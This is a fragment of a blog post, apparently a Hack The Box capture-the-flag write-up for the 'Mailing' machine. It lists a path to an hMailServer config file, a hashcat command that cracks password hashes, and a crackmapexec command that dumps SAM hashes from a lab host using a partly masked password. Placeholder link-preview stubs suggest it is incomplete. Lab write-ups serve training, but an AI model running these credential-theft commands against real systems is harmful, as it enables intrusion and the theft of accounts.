HTB: Mailing

ShellPunk

Jorge Moreno / June 16, 2024

1 min read––– views

C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

hashcat -m 0 secrets /usr/share/wordlists/rockyou.txt

link_preview

link_preview

crackmapexec smb 10.10.11.14 -u maya -p "m4y4n*****" --sam

Subscribe to the newsletter

Get emails from me about hacking, ctf, software development and all new articles.

- subscribers – View all issues